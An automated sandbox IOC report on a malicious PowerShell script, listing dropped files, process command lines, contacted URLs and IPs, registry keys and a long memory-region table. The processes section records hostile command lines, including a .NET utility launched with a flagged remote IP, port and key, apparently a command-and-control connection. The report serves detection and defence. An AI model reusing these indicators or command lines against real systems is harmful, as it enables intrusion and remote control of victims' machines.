IOC Report
Wn0FGQ53RW.ps1

loading gifFilesProcessesURLsIPsRegistryMemdumps64201,00010010Label

Files

File Path
Type
Category
Malicious
Download
Wn0FGQ53RW.ps1
ASCII text, with very long lines (65481), with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x23aa24ca, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cvtres.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icu51ft2.mcv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv5uuwts.5rs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvugv50c.tyt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhkm5ooc.vyf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JHM696ZHJUYK71C5O9NA.temp
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Wn0FGQ53RW.ps1"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 176.113.115.228 4412 P0WER 4C7A640DCC0EFBFFD7AE
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
176.113.115.228
malicious
https://g.live.com/odclientsettings/Prod.C:
unknown
http://nuget.org/NuGet.exe
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://aka.ms/odirmi
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://github.com/Pester/Pester
unknown
https://aka.ms/Vh5j3k
unknown
There are 11 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
176.113.115.228
unknown
Russian Federation
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\4C7A640DCC0EFBFFD7AE
07A3DD4BA22AC1EA5B1F7EC84660C810AEE05DE6DCDEA380B6137CC5D8A30FC8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER_Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ad0dfbb57c2e\50e7d6fd
@{microsoft.windows.photos_2019.19071.12548.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.windows.photos/files/assets/photoslogoextensions.png}
HKEY_CURRENT_USER_Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe%5Cmicrosoft.system.package.metadata%5CS-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri\1d9f5d7d6155f79\50e7d6fd
@{microsoft.zunemusic_10.19071.19011.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/files/assets/fileextension.png}
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3
MRUListEx

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
1EE5FF27000
trusted library allocation
page read and write
malicious
2BD1000
trusted library allocation
page read and write
malicious
1EE5F278000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
1EE5F4AB000
trusted library allocation
page read and write
malicious
8058000
trusted library allocation
page read and write
98733FE000
unkown
page readonly
8A7A000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
30E3000
heap
page read and write
62E9000
heap
page read and write
6E4B000
heap
page read and write
8A74000
trusted library allocation
page read and write
1EE6F2B1000
trusted library allocation
page read and write
4B01000
heap
page read and write
89B2000
trusted library allocation
page read and write
641C000
heap
page read and write
642C000
heap
page read and write
8817000
trusted library allocation
page read and write
2F54000
trusted library allocation
page read and write
CC0000
heap
page read and write
28AFECD0000
trusted library allocation
page read and write
8114000
trusted library allocation
page read and write
567E000
stack
page read and write
2BBE000
stack
page read and write
F9B000
heap
page read and write
2C20000
heap
page read and write
88E5000
trusted library allocation
page read and write
5B7E000
stack
page read and write
88D0000
heap
page read and write
629B000
heap
page read and write
874CABE000
stack
page read and write
C60D000
stack
page read and write
F4B000
trusted library allocation
page execute and read and write
2EAD000
trusted library allocation
page read and write
51C3000
heap
page read and write
8902000
trusted library allocation
page read and write
5310000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
98735FE000
unkown
page readonly
7A2D000
stack
page read and write
80AA000
trusted library allocation
page read and write
6E1D000
stack
page read and write
62B3000
heap
page read and write
6346000
heap
page read and write
82D8000
trusted library allocation
page read and write
81BE000
trusted library allocation
page read and write
7AC2000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
89E1000
trusted library allocation
page read and write
2C16000
trusted library allocation
page read and write
2C4F000
trusted library allocation
page read and write
2BA0000
heap
page read and write
524F000
trusted library allocation
page read and write
6459000
heap
page read and write
9872CFE000
unkown
page readonly
6437000
heap
page read and write
2C9D000
trusted library allocation
page read and write
6CA0000
heap
page read and write
2C9B000
trusted library allocation
page read and write
14BC000
heap
page read and write
28AFEEF6000
heap
page read and write
641C000
heap
page read and write
F8F000
heap
page read and write
30FE000
heap
page read and write
7A6E000
stack
page read and write
79A0000
heap
page execute and read and write
4580000
heap
page read and write
63B2000
heap
page read and write
28AFD6F0000
heap
page read and write
8AEA000
trusted library allocation
page read and write
8AD2000
trusted library allocation
page read and write
8978000
trusted library allocation
page read and write
80F6000
trusted library allocation
page read and write
89BE000
trusted library allocation
page read and write
643D000
heap
page read and write
640F000
heap
page read and write
2EA5000
trusted library allocation
page read and write
647D000
heap
page read and write
2EAF000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
76EB000
stack
page read and write
874C155000
stack
page read and write
987367E000
stack
page read and write
9872DFE000
unkown
page readonly
3132000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
63E0000
heap
page read and write
8931000
trusted library allocation
page read and write
73B5000
heap
page execute and read and write
28AFD82B000
heap
page read and write
2E7D000
trusted library allocation
page read and write
5EFD000
stack
page read and write
59E0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
1EE5EC30000
trusted library allocation
page read and write
28AFF0BA000
trusted library allocation
page read and write
315C000
stack
page read and write
FC0000
trusted library allocation
page read and write
662C000
stack
page read and write
8925000
trusted library allocation
page read and write
11DE000
stack
page read and write
88EB000
trusted library allocation
page read and write
886F000
trusted library allocation
page read and write
645F000
heap
page read and write
317E000
unkown
page read and write
28AFE8A0000
trusted library section
page readonly
8960000
trusted library allocation
page read and write
635E000
heap
page read and write
34F0000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
6E34000
heap
page read and write
2F67000
trusted library allocation
page read and write
4D5E000
stack
page read and write
6323000
trusted library allocation
page read and write
6459000
heap
page read and write
6329000
heap
page read and write
5295000
trusted library allocation
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
28AFDE80000
trusted library allocation
page read and write
731F000
stack
page read and write
28AFEF0A000
heap
page read and write
98737FE000
stack
page read and write
5230000
trusted library allocation
page read and write
2E73000
trusted library allocation
page read and write
28AFD841000
heap
page read and write
6690000
heap
page read and write
30E9000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
15E0000
heap
page read and write
63AF000
heap
page read and write
2F57000
trusted library allocation
page read and write
5310000
trusted library allocation
page read and write
7C10000
trusted library allocation
page read and write
2C5E000
trusted library allocation
page read and write
1EE6F0CD000
trusted library allocation
page read and write
28AFD873000
heap
page read and write
D40000
heap
page read and write
313A000
trusted library allocation
page read and write
13B0000
heap
page read and write
88D3000
trusted library allocation
page read and write
6437000
heap
page read and write
32A9000
heap
page read and write
D56000
heap
page read and write
824B000
trusted library allocation
page read and write
8A16000
trusted library allocation
page read and write
28AFF010000
trusted library allocation
page read and write
8377000
trusted library allocation
page read and write
89F9000
trusted library allocation
page read and write
643D000
heap
page read and write
34A4000
trusted library allocation
page read and write
69BE000
stack
page read and write
6E3A000
heap
page read and write
8908000
trusted library allocation
page read and write
6F01000
heap
page read and write
8348000
trusted library allocation
page read and write
8A2E000
trusted library allocation
page read and write
83AC000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
4D1E000
stack
page read and write
5E40000
heap
page read and write
1EE773A0000
heap
page read and write
5310000
trusted library allocation
page read and write
6346000
heap
page read and write
11AE000
stack
page read and write
402000
remote allocation
page execute and read and write
6345000
heap
page read and write
8A86000
trusted library allocation
page read and write
77FE000
stack
page read and write
890C000
heap
page read and write
3136000
trusted library allocation
page read and write
639C000
heap
page read and write
8983000
trusted library allocation
page read and write
874C1DE000
stack
page read and write
3450000
heap
page read and write
30FE000
heap
page read and write
34D5000
trusted library allocation
page execute and read and write
4D60000
trusted library allocation
page execute and read and write
342E000
stack
page read and write
2C2B000
trusted library allocation
page read and write
28AFEEC4000
heap
page read and write
28AFEF02000
heap
page read and write
6459000
heap
page read and write
2C62000
trusted library allocation
page read and write
819B000
trusted library allocation
page read and write
6329000
heap
page read and write
1037000
heap
page read and write
28AFE015000
heap
page read and write
8846000
trusted library allocation
page read and write
81E7000
trusted library allocation
page read and write
2D5E000
stack
page read and write
874C5FB000
stack
page read and write
FD7000
heap
page read and write
806F000
trusted library allocation
page read and write
63AF000
heap
page read and write
51A0000
trusted library allocation
page read and write
8143000
trusted library allocation
page read and write
6437000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
643D000
heap
page read and write
5E73000
heap
page read and write
7B37000
trusted library allocation
page read and write
28AFF0FF000
trusted library allocation
page read and write
1EE5ED05000
heap
page read and write
62A0000
heap
page read and write
98722FE000
unkown
page readonly
81ED000
trusted library allocation
page read and write
2F37000
trusted library allocation
page read and write
8234000
trusted library allocation
page read and write
8342000
trusted library allocation
page read and write
28AFEDA0000
trusted library allocation
page read and write
647D000
heap
page read and write
FA8000
heap
page read and write
2E7B000
trusted library allocation
page read and write
640F000
heap
page read and write
874CB3F000
stack
page read and write
7AC9000
heap
page read and write
62B8000
heap
page read and write
15DE000
stack
page read and write
28AFD87D000
heap
page read and write
62B8000
heap
page read and write
987407E000
stack
page read and write
1054000
heap
page read and write
28AFECD0000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
4D80000
heap
page read and write
8875000
trusted library allocation
page read and write
8154000
trusted library allocation
page read and write
2C27000
trusted library allocation
page read and write
6437000
heap
page read and write
82EA000
trusted library allocation
page read and write
2C28000
heap
page read and write
1EE5D410000
heap
page read and write
6336000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
82F6000
trusted library allocation
page read and write
5F3C000
stack
page read and write
3303000
heap
page read and write
2F99000
trusted library allocation
page read and write
FBE000
stack
page read and write
6F17000
heap
page read and write
28AFE15A000
heap
page read and write
324B000
heap
page read and write
28AFEE1F000
heap
page read and write
28AFE002000
heap
page read and write
2EB1000
trusted library allocation
page read and write
30FE000
heap
page read and write
9CC000
stack
page read and write
30ED000
trusted library allocation
page read and write
F37000
trusted library allocation
page execute and read and write
15F5000
heap
page read and write
68D0000
trusted library section
page read and write
8ADE000
trusted library allocation
page read and write
6399000
heap
page read and write
28AFF072000
trusted library allocation
page read and write
28AFECC0000
trusted library allocation
page read and write
1EE6067C000
trusted library allocation
page read and write
6331000
trusted library allocation
page read and write
2C40000
heap
page read and write
F20000
trusted library allocation
page read and write
28AFD895000
heap
page read and write
81D6000
trusted library allocation
page read and write
9873AFE000
unkown
page readonly
78A1000
heap
page read and write
4B0C000
heap
page read and write
6459000
heap
page read and write
63E0000
heap
page read and write
8222000
trusted library allocation
page read and write
8301000
trusted library allocation
page read and write
8D0F000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
ED7000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
6346000
heap
page read and write
2F39000
trusted library allocation
page read and write
82A9000
trusted library allocation
page read and write
643E000
heap
page read and write
2F4A000
trusted library allocation
page read and write
812B000
trusted library allocation
page read and write
28B00000000
heap
page read and write
28AFE540000
trusted library allocation
page read and write
D9D000
stack
page read and write
6291000
heap
page read and write
640F000
heap
page read and write
643D000
heap
page read and write
59F0000
trusted library allocation
page read and write
2D53000
trusted library allocation
page read and write
5A00000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
30FE000
heap
page read and write
2F9F000
trusted library allocation
page read and write
7B1E000
heap
page read and write
62E9000
heap
page read and write
8257000
trusted library allocation
page read and write
82E4000
trusted library allocation
page read and write
28AFD8B0000
heap
page read and write
2B80000
heap
page read and write
7BC0000
trusted library allocation
page read and write
5526000
trusted library allocation
page read and write
61A9000
trusted library allocation
page read and write
81E1000
trusted library allocation
page read and write
300E000
unkown
page read and write
55CE000
stack
page read and write
80CD000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
6329000
heap
page read and write
59E0000
trusted library allocation
page read and write
EBD000
heap
page read and write
66AA000
heap
page read and write
98723FE000
stack
page read and write
59E0000
trusted library allocation
page read and write
80BC000
trusted library allocation
page read and write
FD0000
heap
page read and write
28AFF008000
trusted library allocation
page read and write
2EFD000
stack
page read and write
34A3000
trusted library allocation
page execute and read and write
80DF000
trusted library allocation
page read and write
98732FE000
unkown
page readonly
62B3000
heap
page read and write
640F000
heap
page read and write
98739F9000
stack
page read and write
8383000
trusted library allocation
page read and write
2FBA000
trusted library allocation
page read and write
28AFF056000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
1EE5ED00000
heap
page read and write
54F0000
trusted library allocation
page read and write
5293000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1EE5D198000
heap
page read and write
E05000
heap
page read and write
2C18000
trusted library allocation
page read and write
8131000
trusted library allocation
page read and write
87E0000
heap
page read and write
8989000
trusted library allocation
page read and write
28AFEEC9000
heap
page read and write
2A10000
heap
page read and write
1EE5D3A0000
heap
page read and write
6437000
heap
page read and write
8178000
trusted library allocation
page read and write
6325000
trusted library allocation
page read and write
63AF000
heap
page read and write
2B4E000
stack
page read and write
63AF000
heap
page read and write
6399000
heap
page read and write
63AF000
heap
page read and write
1495000
heap
page read and write
98727FC000
stack
page read and write
643D000
heap
page read and write
1EE5D22A000
heap
page read and write
825D000
trusted library allocation
page read and write
1EE774A0000
heap
page read and write
2C51000
trusted library allocation
page read and write
874D60F000
stack
page read and write
893D000
trusted library allocation
page read and write
613E000
stack
page read and write
7B10000
heap
page read and write
30E5000
heap
page read and write
810E000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
8292000
trusted library allocation
page read and write
3C57000
trusted library allocation
page read and write
98738FE000
unkown
page readonly
F70000
heap
page read and write
89D0000
trusted library allocation
page read and write
7B50000
heap
page read and write
1EE6F051000
trusted library allocation
page read and write
4E0E000
stack
page read and write
34B0000
trusted library allocation
page read and write
28AFECB0000
trusted library allocation
page read and write
67CE000
stack
page read and write
28AFEEEC000
heap
page read and write
896C000
trusted library allocation
page read and write
62EE000
stack
page read and write
8966000
trusted library allocation
page read and write
80FC000
trusted library allocation
page read and write
801D000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
3115000
trusted library allocation
page read and write
2F65000
trusted library allocation
page read and write
2E3B000
trusted library allocation
page read and write
116F000
stack
page read and write
813D000
trusted library allocation
page read and write
1EE5D27A000
heap
page read and write
4CCD000
stack
page read and write
5330000
trusted library allocation
page read and write
6E49000
heap
page read and write
8A28000
trusted library allocation
page read and write
30E5000
trusted library allocation
page read and write
28AFF015000
trusted library allocation
page read and write
5A00000
trusted library allocation
page execute and read and write
51DE000
stack
page read and write
9872AFE000
unkown
page readonly
52A0000
trusted library allocation
page read and write
642B000
heap
page read and write
1EE5D425000
heap
page read and write
833C000
trusted library allocation
page read and write
898F000
trusted library allocation
page read and write
FF0000
heap
page read and write
2F52000
trusted library allocation
page read and write
643D000
heap
page read and write
28AFE880000
trusted library section
page readonly
2EA7000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
6EB0000
heap
page read and write
F04000
trusted library allocation
page read and write
88F6000
trusted library allocation
page read and write
1EE774C2000
heap
page read and write
4E5E000
stack
page read and write
2E75000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
52A8000
trusted library allocation
page read and write
62A0000
heap
page read and write
DF8000
heap
page read and write
28AFF020000
trusted library allocation
page read and write
9466000
trusted library allocation
page read and write
F50000
trusted library allocation
page read and write
30FE000
heap
page read and write
31DE000
unkown
page read and write
89CA000
trusted library allocation
page read and write
6C98000
stack
page read and write
6329000
heap
page read and write
2AA0000
heap
page read and write
E5B000
heap
page read and write
640F000
heap
page read and write
530E000
trusted library allocation
page read and write
640F000
heap
page read and write
D50000
heap
page read and write
68CE000
stack
page read and write
50E0000
trusted library allocation
page read and write
8365000
trusted library allocation
page read and write
3BD9000
trusted library allocation
page read and write
807B000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
5243000
trusted library allocation
page read and write
6346000
heap
page read and write
828C000
trusted library allocation
page read and write
28AFD85B000
heap
page read and write
827A000
trusted library allocation
page read and write
2C2F000
trusted library allocation
page read and write
2F72000
trusted library allocation
page read and write
3290000
heap
page read and write
66BF000
heap
page read and write
30CE000
trusted library allocation
page read and write
1EE5D170000
heap
page read and write
2BD0000
heap
page read and write
15E4000
heap
page read and write
30FE000
trusted library allocation
page read and write
6EAB000
heap
page read and write
28AFEE4F000
heap
page read and write
2B90000
heap
page read and write
80A4000
trusted library allocation
page read and write
82D2000
trusted library allocation
page read and write
874C47E000
stack
page read and write
8995000
trusted library allocation
page read and write
88E0000
heap
page read and write
874C4FD000
stack
page read and write
640F000
heap
page read and write
6330000
heap
page read and write
87DD000
trusted library allocation
page read and write
8898000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
8274000
trusted library allocation
page read and write
874C67E000
stack
page read and write
721F000
stack
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
7FFD9B960000
trusted library allocation
page execute and read and write
2AC0000
heap
page read and write
2AA6000
heap
page read and write
3220000
heap
page read and write
3269000
stack
page read and write
8A05000
trusted library allocation
page read and write
4C8C000
stack
page read and write
87D0000
heap
page read and write
C30000
heap
page read and write
82F0000
trusted library allocation
page read and write
641C000
heap
page read and write
5A10000
trusted library allocation
page read and write
2C31000
trusted library allocation
page read and write
888D000
trusted library allocation
page read and write
816C000
trusted library allocation
page read and write
28AFF08E000
trusted library allocation
page read and write
6336000
heap
page read and write
725E000
stack
page read and write
307C000
stack
page read and write
1EE7720E000
heap
page read and write
617D000
stack
page read and write
28AFEE42000
heap
page read and write
8394000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
534E000
stack
page read and write
7C80000
trusted library allocation
page read and write
81A1000
trusted library allocation
page read and write
2D4B000
trusted library allocation
page read and write
F30000
trusted library allocation
page read and write
7FFD9B826000
trusted library allocation
page read and write
28AFED00000
trusted library allocation
page read and write
28AFD902000
heap
page read and write
88B0000
trusted library allocation
page read and write
5310000
trusted library allocation
page read and write
1350000
heap
page read and write
8972000
trusted library allocation
page read and write
28AFEE0F000
heap
page read and write
FD8000
heap
page read and write
598E000
stack
page read and write
28AFEC40000
trusted library allocation
page read and write
874C6FE000
stack
page read and write
8319000
trusted library allocation
page read and write
11C0000
heap
page read and write
641C000
heap
page read and write
28AFD710000
heap
page read and write
1EE5D24B000
heap
page read and write
987337E000
stack
page read and write
63A9000
heap
page read and write
1EE5F4A7000
trusted library allocation
page read and write
1EE776D0000
trusted library section
page read and write
7B18000
heap
page read and write
28AFED10000
trusted library allocation
page read and write
28AFD88F000
heap
page read and write
1EE6F0C1000
trusted library allocation
page read and write
28AFE11A000
heap
page read and write
59F0000
trusted library allocation
page read and write
F1D000
trusted library allocation
page execute and read and write
835F000
trusted library allocation
page read and write
CD6000
heap
page read and write
28A80000000
trusted library allocation
page read and write
2E64000
trusted library allocation
page read and write
8A22000
trusted library allocation
page read and write
8228000
trusted library allocation
page read and write
6329000
heap
page read and write
1019000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
8195000
trusted library allocation
page read and write
2BC0000
heap
page execute and read and write
33CF000
stack
page read and write
6E20000
heap
page read and write
98729FB000
stack
page read and write
88DF000
trusted library allocation
page read and write
2EBE000
trusted library allocation
page read and write
643D000
heap
page read and write
F92000
heap
page read and write
2EB3000
trusted library allocation
page read and write
63AF000
heap
page read and write
63EC000
heap
page read and write
2C99000
trusted library allocation
page read and write
1EE5F49D000
trusted library allocation
page read and write
815A000
trusted library allocation
page read and write
66B4000
heap
page read and write
2E92000
trusted library allocation
page read and write
1370000
heap
page read and write
62E9000
heap
page read and write
645F000
heap
page read and write
1EE5FF25000
trusted library allocation
page read and write
7510000
heap
page read and write
7DE0000
heap
page read and write
563E000
stack
page read and write
2E49000
trusted library allocation
page read and write
923A000
trusted library allocation
page read and write
1EE5D190000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
6E76000
heap
page read and write
3196000
heap
page read and write
1EE776E0000
trusted library section
page read and write
6292000
heap
page read and write
28AFEE61000
heap
page read and write
50E0000
trusted library allocation
page read and write
1453000
heap
page read and write
59E0000
trusted library allocation
page read and write
77EE000
stack
page read and write
2AE0000
heap
page read and write
644A000
heap
page read and write
30E7000
trusted library allocation
page read and write
8ABB000
trusted library allocation
page read and write
635A000
heap
page read and write
6380000
trusted library allocation
page execute and read and write
98728FE000
unkown
page readonly
5289000
trusted library allocation
page read and write
28AFF0E8000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
76ED000
stack
page read and write
8125000
trusted library allocation
page read and write
5275000
trusted library allocation
page read and write
5290000
heap
page execute and read and write
884C000
trusted library allocation
page read and write
28AFD813000
heap
page read and write
98725FE000
stack
page read and write
8216000
trusted library allocation
page read and write
28AFEF00000
heap
page read and write
8A34000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
816F000
stack
page read and write
30E5000
heap
page read and write
63AF000
heap
page read and write
6E49000
heap
page read and write
F26000
trusted library allocation
page execute and read and write
51E1000
trusted library allocation
page read and write
9872BFB000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
6670000
heap
page read and write
2FA3000
trusted library allocation
page read and write
8AB5000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
8A10000
trusted library allocation
page read and write
7319000
stack
page read and write
1EE770CD000
heap
page read and write
2FBC000
trusted library allocation
page read and write
8869000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
6437000
heap
page read and write
2E45000
trusted library allocation
page read and write
2FA5000
trusted library allocation
page read and write
30FE000
heap
page read and write
6F01000
heap
page read and write
792B000
stack
page read and write
8330000
trusted library allocation
page read and write
7A50000
trusted library allocation
page read and write
6F10000
heap
page read and write
28AFE8C0000
trusted library section
page readonly
7FFA000
trusted library allocation
page read and write
8BE8000
heap
page read and write
889E000
trusted library allocation
page read and write
88BC000
trusted library allocation
page read and write
63EC000
heap
page read and write
30B7000
stack
page read and write
874CC3C000
stack
page read and write
13B7000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
F3A000
trusted library allocation
page execute and read and write
697E000
stack
page read and write
FF530000
trusted library allocation
page execute and read and write
28AFEEE3000
heap
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
1EE5D274000
heap
page read and write
9113000
trusted library allocation
page read and write
7B05000
heap
page read and write
2E77000
trusted library allocation
page read and write
2E62000
trusted library allocation
page read and write
28AFF06F000
trusted library allocation
page read and write
14C1000
heap
page read and write
5266000
trusted library allocation
page read and write
5E73000
heap
page read and write
59E0000
trusted library allocation
page read and write
8A51000
trusted library allocation
page read and write
28AFEEE8000
heap
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
6249000
trusted library allocation
page read and write
28AFEE54000
heap
page read and write
8880000
heap
page read and write
874CA3E000
stack
page read and write
30CC000
trusted library allocation
page read and write
603E000
stack
page read and write
803A000
trusted library allocation
page read and write
1EE5D160000
heap
page read and write
6931000
trusted library allocation
page read and write
7DF4DC900000
trusted library allocation
page execute and read and write
6319000
trusted library allocation
page read and write
34D7000
trusted library allocation
page execute and read and write
643D000
heap
page read and write
640F000
heap
page read and write
13D0000
heap
page read and write
1EE5F49F000
trusted library allocation
page read and write
82C1000
trusted library allocation
page read and write
874C83E000
stack
page read and write
30E5000
heap
page read and write
80B0000
trusted library allocation
page read and write
28AFD8A2000
heap
page read and write
59F0000
trusted library allocation
page read and write
28AFF091000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
73FB000
stack
page read and write
8A92000
trusted library allocation
page read and write
DF0000
heap
page read and write
53C0000
heap
page execute and read and write
4AC0000
heap
page read and write
80E5000
trusted library allocation
page read and write
82AF000
trusted library allocation
page read and write
1EE5D360000
heap
page read and write
66AE000
heap
page read and write
1EE5D420000
heap
page read and write
30D0000
trusted library allocation
page read and write
8943000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
2EC0000
trusted library allocation
page read and write
8286000
trusted library allocation
page read and write
54C9000
stack
page read and write
321E000
stack
page read and write
98724FE000
unkown
page readonly
2C22000
trusted library allocation
page read and write
6F01000
heap
page read and write
66C7000
heap
page read and write
883A000
trusted library allocation
page read and write
30D0000
heap
page read and write
647D000
heap
page read and write
98740FE000
unkown
page readonly
2C36000
trusted library allocation
page read and write
28AFE201000
trusted library allocation
page read and write
28AFE000000
heap
page read and write
27CC000
stack
page read and write
641C000
heap
page read and write
28AFF107000
trusted library allocation
page read and write
895A000
trusted library allocation
page read and write
EBF000
heap
page read and write
28AFF0A0000
trusted library allocation
page read and write
529D000
trusted library allocation
page read and write
100D000
heap
page read and write
874CBBF000
stack
page read and write
6E37000
heap
page read and write
2E47000
trusted library allocation
page read and write
52A3000
trusted library allocation
page read and write
87D1000
heap
page read and write
8AA3000
trusted library allocation
page read and write
63A9000
heap
page read and write
7B11000
trusted library allocation
page read and write
3102000
trusted library allocation
page read and write
30FE000
heap
page read and write
640F000
heap
page read and write
81D0000
trusted library allocation
page read and write
8A1C000
trusted library allocation
page read and write
874C57E000
stack
page read and write
8040000
trusted library allocation
page read and write
276B000
stack
page read and write
28AFECE0000
trusted library allocation
page read and write
2F6D000
trusted library allocation
page read and write
1EE61080000
trusted library allocation
page read and write
6297000
heap
page read and write
74BD000
